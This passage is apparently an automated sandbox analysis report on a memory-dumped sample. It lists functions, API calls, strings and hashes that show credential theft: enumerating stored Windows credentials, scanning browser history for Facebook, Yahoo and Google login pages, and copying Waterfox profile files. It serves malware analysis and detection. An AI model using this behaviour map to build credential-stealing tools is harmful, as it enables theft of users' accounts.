                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                    • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                    • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                    • String ID: bhv
                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2941347001-70141382
                                                                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                    • String ID: visited:
                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 722 40e175-40e1a1 call 40695d call 406b90 727 40e1a7-40e1e5 memset 722->727 728 40e299-40e2a8 call 4069a3 722->728 730 40e1e8-40e1fa call 406e8f 727->730 734 40e270-40e27d call 406b53 730->734 735 40e1fc-40e219 call 40dd50 * 2 730->735 734->730 741 40e283-40e286 734->741 735->734 746 40e21b-40e21d 735->746 742 40e291-40e294 call 40aa04 741->742 743 40e288-40e290 free 741->743 742->728 743->742 746->734 747 40e21f-40e235 call 40742e 746->747 747->734 750 40e237-40e242 call 40aae3 747->750 750->734 753 40e244-40e26b _snwprintf call 40a8d0 750->753 753->734
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                    • Opcode ID: 1819b8f3d47d6cdb348ff1420b20e26a6f59b115d18303308c7c076ac85f3e5c
                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                    • Opcode Fuzzy Hash: 1819b8f3d47d6cdb348ff1420b20e26a6f59b115d18303308c7c076ac85f3e5c
                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 115830560-3916222277
                                                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                    Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 845 40a804-40a839 memset 846 40a83b-40a847 GetSystemDirectoryW 845->846 847 40a84c-40a87f wcscpy call 409719 wcscat LoadLibraryW 845->847 846->847 850 40a881-40a884 LoadLibraryW 847->850 851 40a886-40a888 847->851 850->851
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: C:\Windows\system32
                                                                                                    • API String ID: 669240632-2896066436
                                                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 852 40bdb0-40bdce call 404363 855 40bf63-40bf6f call 40440c 852->855 856 40bdd4-40bddd 852->856 858 40bdee 856->858 859 40bddf-40bdec CredEnumerateW 856->859 861 40bdf0-40bdf2 858->861 859->861 861->855 862 40bdf8-40be18 call 40b2cc wcslen 861->862 865 40bf5d 862->865 866 40be1e-40be20 862->866 865->855 866->865 867 40be26-40be42 wcsncmp 866->867 868 40be48-40be77 call 40bd5d call 404423 867->868 869 40bf4e-40bf57 867->869 868->869 874 40be7d-40bea3 memset 868->874 869->865 869->866 875 40bea5 874->875 876 40bea7-40beea memcpy 874->876 875->876 877 40bf11-40bf2d wcschr 876->877 878 40beec-40bf06 call 40b2cc _wcsnicmp 876->878 880 40bf38-40bf48 LocalFree 877->880 881 40bf2f-40bf35 877->881 878->877 884 40bf08-40bf0e 878->884 880->869 881->880 884->877
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 697348961-0
                                                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$FolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                    • API String ID: 3327325665-11920434
                                                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
